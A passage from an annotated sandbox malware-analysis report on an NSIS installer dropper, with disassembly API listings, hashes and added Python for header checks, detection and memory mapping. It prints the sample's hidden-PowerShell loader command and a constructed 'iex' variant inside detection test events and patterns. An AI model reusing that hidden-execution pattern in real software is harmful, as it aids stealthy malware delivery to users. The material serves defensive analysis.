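def build_sample(flags: int = 0, corrupt: bool = False) -> bytes:
    """Constructed stand-in for an installer (not a real PE): 512 bytes of stub
    padding, the first header, a 64-byte header block, 200 bytes of payload and
    the trailing CRC32. corrupt=True flips one payload byte after the CRC is taken."""
    stub = b"MZ" + b"\x00" * 510
    header_block = b"H" * 64
    payload = b"D" * 200
    total_len = FH_STRUCT.size + len(header_block) + len(payload) + 4
    first_header = FH_STRUCT.pack(flags, FH_SIG, FH_MAGIC, len(header_block), total_len)
    body = stub + first_header + header_block + payload
    crc = binascii.crc32(body)
    if corrupt:
        body = body[:-1] + b"X"
    return body + struct.pack("<I", crc)


if __name__ == "__main__":
    for label, blob in (("intact", build_sample()), ("corrupted", build_sample(corrupt=True))):
        offset, fields = find_first_header(blob)
        print(label, "header at", hex(offset), "flags", fields["flags"],
              "integrity", integrity_ok(blob, offset, fields))
```

For triage the check is informational only: an attacker-built installer always passes its own CRC, and the NO_CRC flag turns it off entirely. Its value is that a correctly located first header tells you where the compressed script and payload begin, which is what extraction tools work from when pulling the dropped files out of a sample like this one.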

                                                                    Control-flow Graph

                                                                    Control-flow graph (rendered in the original report) for the function at 0x0040657E (0x0040657E-0x004067EC): the NSIS string-expansion routine, which calls itself recursively (at 0x00406793) and the internal routines 406541, 40640F, 4067EF, 406488 and 406935. It resolves the system directory via GetSystemDirectoryW, the Windows directory via GetWindowsDirectoryW, shell folders via SHGetPathFromIDListW/CoTaskMemFree, appends "\Microsoft\Internet Explorer\Quick Launch" for the Quick Launch folder and reads Software\Microsoft\Windows\CurrentVersion for the program-files paths. The strings below also show one expansion result: the `powershell.exe -windowstyle hidden "$Prmierer=gc -raw '...resprmiernes` command line (truncated in the report) that hands execution from the installer to a hidden PowerShell reading a dropped file from the user's Temp directory. The APIs are listed below.
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
                                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                                                    • lstrlenW.KERNEL32(: Completed,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                                                    Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as the first function above (00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, offset 00400000, based on PE; hcaresult_0_2_400000_RFQ 008191.jbxd)
                                                                    Similarity
                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                    • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$daniglacial$powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes
                                                                    • API String ID: 4024019347-3412683584
                                                                    • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                    • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                                    • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                    • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E
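The expanded strings above show the installer handing control to PowerShell with a hidden window and a script read from the user's Temp directory. The Python below is an added detection example, not part of the report and not a vendor or Sigma rule: it scores Sysmon/EDR-style process-creation events for that combination, tolerating the abbreviated parameter forms powershell.exe accepts (`-w h` as well as `-windowstyle hidden`, `gc`/`cat`/`type` as well as `Get-Content`). The field names (ParentImage, Image, CommandLine) follow Sysmon event ID 1; the three events are constructed for this example, the first modelled on this report's command line, which the report shows truncated, so the closing quotes are an assumption.

```python
# Added example (not from the Joe Sandbox report): triage of process-creation events
# for an installer from a user-writable directory spawning hidden PowerShell that
# reads its script from a temp path, the hand-off seen in the strings above.
import re
from pathlib import PureWindowsPath


def _abbrev(word: str) -> str:
    """Regex alternation of every prefix of `word`, longest first; powershell.exe
    accepts any unambiguous prefix of a parameter (-w, -win, -windowstyle)."""
    return "(?:" + "|".join(re.escape(word[:n]) for n in range(len(word), 0, -1)) + ")"


RE_HIDDEN = re.compile(r"(?i)(?<![\w-])-" + _abbrev("windowstyle") + r"\s+" + _abbrev("hidden") + r"(?!\w)")
# Directories an unprivileged user can write to; short names like user~1 are covered by [^\\]+
RE_USER_WRITABLE = re.compile(
    r"(?i)\\(?:Users\\[^\\]+\\(?:AppData\\Local\\Temp|Desktop|Downloads)|Windows\\Temp|ProgramData)\\")
# A Get-Content style read and the argument text that follows it up to the next ; or |
RE_READ = re.compile(r"(?i)(?:^|[\s;=(])(?:gc|cat|type|get-content)\b(?P<args>[^;|]*)")
RE_WIN_PATH = re.compile(r"[A-Za-z]:\\[^'\"\s;|]+")
# Script text captured into a variable, the usual prelude to iex / Invoke-Expression
RE_VAR_LOAD = re.compile(r"(?i)\$\w+\s*=\s*(?:gc|cat|type|get-content|\[(?:System\.)?IO\.File\]::ReadAll\w+)\b")
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def indicators(event: dict) -> list:
    """Names of the indicators present in one process-creation event."""
    parent, image, cmd = event["ParentImage"], event["Image"], event["CommandLine"]
    found = []
    if PureWindowsPath(image).name.lower() in POWERSHELL_IMAGES:
        found.append("powershell_child")
    if RE_USER_WRITABLE.search(parent):
        found.append("parent_in_user_writable_dir")
    if RE_HIDDEN.search(cmd):
        found.append("hidden_window")
    if RE_VAR_LOAD.search(cmd):
        found.append("script_loaded_into_variable")
    for m in RE_READ.finditer(cmd):
        path = RE_WIN_PATH.search(m.group("args"))
        if path and RE_USER_WRITABLE.search(path.group(0)):
            found.append("script_read_from_user_writable_dir")
            break
    return found


def is_suspicious(event: dict) -> bool:
    """Alert on a PowerShell child that carries at least two further indicators."""
    found = indicators(event)
    return "powershell_child" in found and len(found) >= 3


# Constructed sample events (Sysmon event ID 1 field names). The first is modelled on
# this report's command line; its closing quotes are assumed, the report truncates it.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Users\user\Desktop\RFQ 008191.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes'"''',
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Program Files\Contoso\update.ps1'",
    },
    {
        "ParentImage": r"C:\Users\user\Downloads\invoice.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''powershell -w h -nop "$s=cat 'C:\Users\user\AppData\Local\Temp\x.txt'; iex $s"''',
    },
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(is_suspicious(event), indicators(event), event["CommandLine"][:60])
```

The scoring deliberately does not key on the invented directory names (Blankbook85, patchworkenes) from this sample; those change per build, while the shape, an executable in Desktop or Downloads spawning hidden PowerShell that slurps a Temp file into a variable, is what carries across this loader family's campaigns.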

                                                                    Control-flow Graph

                                                                    Control-flow graph (rendered in the original report) for the function at 0x00401794 (0x00401794-0x00402C5E): the NSIS File-extraction opcode. It calls the internal routines 402DCB, 405E87, 406541, 405E10, 4067EF, 40689E, 40600C, 406031, 4055C6, 4032D9, 405BA1 and 40657E: it builds the destination path (lstrcatW, here under ...\resprmiernes\svuppende\Johannean), compares timestamps with CompareFileTime to decide whether to overwrite, opens or creates the file via 406031, decompresses the data block via 4032D9, restores the original timestamp with SetFileTime, closes the handle and logs the action to the details view via 4055C6. The APIs are listed below.
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000,32079,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean,?,?,00000031), ref: 004017D5
                                                                    • CompareFileTime.KERNEL32(-00000014,?,32079,32079,00000000,00000000,32079,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean,?,?,00000031), ref: 004017FA
                                                                      • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                      • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                      • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                      • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                      • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                    Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as the first function above (00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, offset 00400000, based on PE; hcaresult_0_2_400000_RFQ 008191.jbxd)
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID: 32079$C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean$hadefuldeste\optjeningers\hottish
                                                                    • API String ID: 1941528284-2145868179
                                                                    • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                    • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                                    • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                    • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D

                                                                    Control-flow Graph

                                                                    Control-flow graph (rendered in the original report) for the function at 0x004055C6 (0x004055C6-0x00405696): the NSIS details-view logger, calling the internal routine 40657E. It measures and concatenates the message text (lstrlenW, lstrcatW), updates the status line with SetWindowTextW, and drives the details list view with SendMessageW using LVM_GETITEMCOUNT (0x1004), LVM_INSERTITEMW (0x104D) and LVM_ENSUREVISIBLE (0x1013). The APIs are listed below.
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                    • lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                    • lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                    • SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                    Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as the first function above (00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, offset 00400000, based on PE; hcaresult_0_2_400000_RFQ 008191.jbxd)
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID: daniglacial
                                                                    • API String ID: 2531174081-766043870
                                                                    • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                    • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                                    • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                    • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 551687249-2449383134
                                                                    • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                    • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                                    • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                    • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                    • wsprintfW.USER32 ref: 00406917
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME
                                                                    • API String ID: 2200240437-1106614640
                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                    • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                    • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040607E
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806), ref: 00406099
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                    • API String ID: 1716503409-3083371207
                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                    • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                    • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405EC9
                                                                      • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                      • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                      • Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean,?,00000000,000000F0), ref: 00401672
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean, xrefs: 00401665
                                                                    Similarity
                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean
                                                                    • API String ID: 1892508949-2601639953
                                                                    • Opcode ID: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                                                    • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                                                    • Opcode Fuzzy Hash: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                                                    • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D

                                                                    Control-flow Graph

                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                    • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                                    • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                    • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                    • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                                                    • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                    • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
• Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
• Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
• Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
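Every entry in this listing carries the same set of thirteen ".sdmp" dump names, one per memory region of the unpacked image at 0x400000. Read together they are a memory map of that process. The script below is an added example, not part of the Joe Sandbox report: it parses the dump names copied from the "Source File" / "Associated" lines above into regions, orders them by base address, and flags any region with an execute bit. Joe Sandbox does not document the naming scheme, so treating field 4 as the region base, field 5 as a Windows PAGE_* protection value and field 7 as a MEM_* type is an assumption of this example, chosen because those readings line up with a normal 32-bit PE layout (read-only header at 0x400000, execute-read code at 0x401000, read-write data above it); the remaining fields are left undecoded.

```python
"""Rebuild a memory map from the Joe Sandbox dump-file names listed above.

Added example; not part of the Joe Sandbox report. ASSUMPTION (undocumented
by Joe Sandbox): in '<f1>.<f2>.<f3>.<f4>.<f5>.<f6>.<f7>.<f8>.sdmp', f4 is the
region base, f5 a PAGE_* protection and f7 a MEM_* type. f1-f3, f6 and f8 are
kept as raw strings.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# winnt.h memory-protection constants, used to decode the assumed protection field.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0  # any of the four PAGE_EXECUTE* values
# winnt.h memory-type constants, used to decode the assumed type field.
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}

# Constructed input: the thirteen dump names copied from the entries above.
DUMP_NAMES = [
    "00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp",
]


@dataclass(frozen=True)
class DumpRegion:
    prefix: Tuple[str, str, str]  # f1-f3, undecoded
    base: int                     # f4, assumed region base address
    protect: int                  # f5, assumed PAGE_* protection
    raw6: str                     # f6, undecoded
    mem_type: int                 # f7, assumed MEM_* type
    raw8: str                     # f8, undecoded


def parse_dump_name(name: str) -> DumpRegion:
    """Split one dump name into its eight dot-separated fields."""
    if not name.endswith(".sdmp"):
        raise ValueError(f"not a .sdmp dump name: {name!r}")
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 fields, got {len(fields)}: {name!r}")
    return DumpRegion(
        prefix=(fields[0], fields[1], fields[2]),
        base=int(fields[3], 16),
        protect=int(fields[4], 16),
        raw6=fields[5],
        mem_type=int(fields[6], 16),
        raw8=fields[7],
    )


def memory_map(names: List[str]) -> List[Tuple[int, Optional[int], str, str]]:
    """Sort regions by base; size each one by the gap to the next base (last is unknown)."""
    regions = sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)
    rows = []
    for i, r in enumerate(regions):
        size = regions[i + 1].base - r.base if i + 1 < len(regions) else None
        rows.append((r.base, size,
                     PAGE_PROTECTION.get(r.protect, hex(r.protect)),
                     MEM_TYPE.get(r.mem_type, hex(r.mem_type))))
    return rows


def executable_bases(names: List[str]) -> List[int]:
    """Bases of regions whose assumed protection carries an execute bit.

    A region that is both writable and executable (0x40 / 0x80) is the first
    place to look for an unpacking stub; this image has only execute-read code.
    """
    return sorted(r.base for r in map(parse_dump_name, names) if r.protect & EXECUTE_MASK)


if __name__ == "__main__":
    for base, size, prot, kind in memory_map(DUMP_NAMES):
        size_s = "?" if size is None else f"{size:#x}"
        print(f"{base:#010x} {size_s:>8} {prot:<24} {kind}")
    print("executable:", [hex(b) for b in executable_bases(DUMP_NAMES)])
```

Run as a script it prints one row per region; the only executable region is the 0x7000-byte code section at 0x401000, which is where every "ref:" address in the API lists of this section falls.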
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
• Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
• Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
• Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
• Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
• Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
• Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
